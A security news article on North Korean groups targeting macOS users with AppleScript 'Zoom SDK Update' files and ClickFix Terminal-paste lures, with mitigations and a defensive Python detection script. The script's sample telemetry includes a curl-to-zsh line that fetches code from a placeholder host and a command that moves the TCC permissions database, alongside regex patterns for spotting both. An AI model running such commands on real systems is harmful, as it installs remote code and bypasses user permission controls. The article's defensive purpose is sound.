North Korean Hackers Use AppleScript and ClickFix on macOS


An update on the macOS ClickFix threat: North Korean actors Sapphire Sleet and UNC1069 are now deploying AppleScript-based delivery chains and "Terminal-paste" lures to steal crypto-wallets and credentials from enterprise targets.

SEOUL, SOUTH KOREA — The "ClickFix" social engineering phenomenon has officially evolved into a targeted nation-state weapon. Recent intelligence from Microsoft and Mandiant confirms that North Korean-linked actors are now aggressively targeting macOS environments within the fintech, crypto, and healthcare sectors. By pivoting from generic web lures to sophisticated AppleScript-based delivery chains, groups like Sapphire Sleet are bypassing traditional macOS notarization and Gatekeeper controls by tricking users into manually authorizing the infection.

This campaign represents a significant escalation of the tactics we first identified in The ClickFix Trap: How Mac Users Are Being Tricked Into Hacking Themselves, moving from opportunistic web-browser scams to high-precision state espionage.


Threat Intelligence: macOS Attack Vectors

Metric             Detail
Primary Hotspots   Seoul, South Korea (regional hub)
Primary Actors     Sapphire Sleet (APT38), UNC1069 / UNC1609
Execution Vectors  AppleScript (.scpt), ClickFix (Terminal paste)
Target Data        Keychain, crypto-wallets, Telegram, Apple Notes

The Attack: User-Initiated Execution

The core of this campaign is a "fake technical issue" staged during a high-pressure recruitment call or video meeting. Unlike Windows-focused ClickFix attacks that rely on clipboard hijacking, the macOS variant abuses native system capabilities to gain execution and persistence, along two primary paths:

1. The AppleScript "SDK Update"

Used by Sapphire Sleet, this path delivers a compiled AppleScript file (Zoom SDK Update.scpt) masquerading as a critical video fix. Opening the file launches it in Script Editor by default, and the attacker then persuades the user to click the "Run" button. This starts a multi-stage chain that modifies the TCC (Transparency, Consent, and Control) database to grant itself permissions silently, effectively giving the malware "Full Disk Access" without the standard system prompt.

2. The ClickFix Terminal Lure

Actors like UNC1069 use hijacked LinkedIn accounts to invite targets to fake technical interviews. When "connection issues" arise, the victim is prompted to copy a command (typically a curl | zsh pipeline) and paste it into the Terminal. This downloads the "Mach-O Man" binary, a persistent information stealer that targets browser sessions and wallet seeds stored in local Application Support folders.


What to Do Now: Immediate Actions

  • Block Unsigned Scripts: Use MDM (Jamf, Kandji, Intune) to restrict the execution of .scpt and .applescript files that are not notarized by your organization.
  • Terminal Paste Protection: Educate users on the "New macOS Terminal Warning," which alerts users when multi-line commands containing curl or sudo are pasted into the Terminal app.
  • Audit TCC Modifications: Monitor for unauthorized moves or renames of ~/Library/Application Support/com.apple.TCC/TCC.db, a common indicator of Sapphire Sleet activity attempting to grant itself permissions.
  • Hardware MFA: Transition high-value accounts (crypto exchanges, GitHub, cloud consoles) to FIDO2 hardware keys (YubiKey) to mitigate the impact of stolen session cookies.
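The three host-level indicators named above (a curl pipeline pasted into Terminal, a downloaded .scpt run through Script Editor or osascript, and a rename or move of the per-user TCC.db) can be turned into a small triage rule set. The script below is an added example written for this article, not code from Microsoft, Mandiant or any vendor; the event records, their field names and the example.invalid URLs are constructed for the demonstration and do not correspond to a real EDR or Endpoint Security schema. It classifies each record against the three indicators and returns the hits.

```python
"""Triage rules for the macOS ClickFix / AppleScript delivery chain.

Assumed input: process-start ("exec") and filesystem ("file") events as they
might be exported from an EDR or an Endpoint Security client. The field names
below are an assumption made for this example, not a real product schema.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Event:
    kind: str            # "exec" (process start) or "file" (filesystem operation)
    user: str
    parent: str = ""     # parent process name, exec events only
    cmdline: str = ""    # full command line, exec events only
    op: str = ""         # "rename", "move", "write", ... for file events
    src: str = ""        # source path for file events
    dst: str = ""        # destination path for rename/move events


# curl output piped straight into a shell, the classic "Terminal paste" lure
CURL_PIPE = re.compile(r"\bcurl\b[^|]*\|\s*(sudo\s+)?(zsh|bash|sh)\b")
# Script Editor or osascript executing a compiled AppleScript file
SCRIPT_RUN = re.compile(r"(osascript|Script Editor)\b.*\.scpt\b")
# a shell command that moves or copies files (cp/ln included for completeness)
MOVE_CMD = re.compile(r"(^|[\s/])(mv|cp|ln)\s")
# the per-user TCC database named in the mitigation list above
TCC_DB = re.compile(r"/Library/Application Support/com\.apple\.TCC/TCC\.db\b")


def classify(ev: Event) -> Optional[str]:
    """Return a detection tag for one event, or None if it matches no rule."""
    if ev.kind == "exec":
        # Rule 1: a pasted curl | zsh pipeline running under Terminal
        if ev.parent == "Terminal" and CURL_PIPE.search(ev.cmdline):
            return "clickfix_terminal_paste"
        # Rule 2: a .scpt executed from the user's Downloads folder
        if SCRIPT_RUN.search(ev.cmdline) and "/Downloads/" in ev.cmdline:
            return "applescript_from_downloads"
        # Rule 3a: TCC.db moved or copied via a shell command
        if MOVE_CMD.search(ev.cmdline) and TCC_DB.search(ev.cmdline):
            return "tcc_db_tamper"
    elif ev.kind == "file":
        # Rule 3b: TCC.db renamed or moved at the filesystem level
        if ev.op in ("rename", "move") and TCC_DB.search(ev.src):
            return "tcc_db_tamper"
    return None


def scan(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (index, tag) for every event that triggers a rule."""
    hits = []
    for i, ev in enumerate(events):
        tag = classify(ev)
        if tag:
            hits.append((i, tag))
    return hits


TCC_PATH = "/Users/alice/Library/Application Support/com.apple.TCC/TCC.db"

# Constructed sample telemetry: three malicious patterns mixed with benign noise.
SAMPLE_EVENTS = [
    Event("exec", "alice", parent="Terminal",
          cmdline="zsh -c 'curl -fsSL https://example.invalid/fix-audio.sh | zsh'"),
    Event("exec", "alice", parent="Terminal",
          cmdline="curl -s https://example.invalid/healthz | jq ."),          # benign
    Event("exec", "alice", parent="Finder",
          cmdline="/usr/bin/osascript /Users/alice/Downloads/Zoom SDK Update.scpt"),
    Event("exec", "alice", parent="launchd",
          cmdline="/usr/bin/osascript /Users/alice/Library/Scripts/backup.scpt"),  # benign
    Event("exec", "alice", parent="zsh",
          cmdline=f"mv {TCC_PATH} {TCC_PATH}.orig"),
    Event("file", "alice", op="rename", src=TCC_PATH, dst=TCC_PATH + ".bak"),
    Event("file", "alice", op="write", src=TCC_PATH),                         # normal tccd write
]


if __name__ == "__main__":
    for idx, tag in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {tag}  user={SAMPLE_EVENTS[idx].user}")
```

Run against the constructed sample it flags events 0, 2, 4 and 5 and ignores the benign curl-to-jq call, the scheduled script under ~/Library/Scripts and the routine write to TCC.db. Rule 2 keys on the Downloads folder only because that is where a file received during a video call typically lands; a fleet that allows user-authored scripts elsewhere can tighten or widen that path list without touching the other rules.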

The CyberSignal Analysis: Strategic Signals

Signal 01 — macOS as the High-Value Frontier

North Korea is no longer testing the waters; they are diving deep into macOS. As high-revenue developers and crypto-traders shift to Mac-only fleets, groups like BlueNoroff have built specialized malware stacks specifically to harvest macOS Keychain and wallet data. This highlights a critical oversight in many corporate security models that view macOS as "inherently safer" than Windows.

Signal 02 — The Trust-as-a-Service Vulnerability

The "ClickFix" vector proves that social engineering is now a native system utility. By leveraging the user's familiarity with "fixing audio issues" or "updating tools," attackers move execution into a user-authorized context, rendering traditional Gatekeeper and Notarization protections moot. The attack succeeds not because of a bug in the code, but because of a bug in human trust.

Signal 03 — The Supply Chain Pivot

Recent North Korean activity includes poisoning the widely used axios NPM package to deliver the WAVESHAPER backdoor. This indicates a dual-track strategy: targeting individual high-value users via social engineering while simultaneously seeding the broader development ecosystem with malicious dependencies to facilitate lateral movement across cloud environments.


Sources

Type          Source
Technical     Microsoft: Sapphire Sleet Intrusion
Analysis      SecurityWeek: North Korean ClickFix
Supply Chain  Google Cloud: Axios NPM Attack
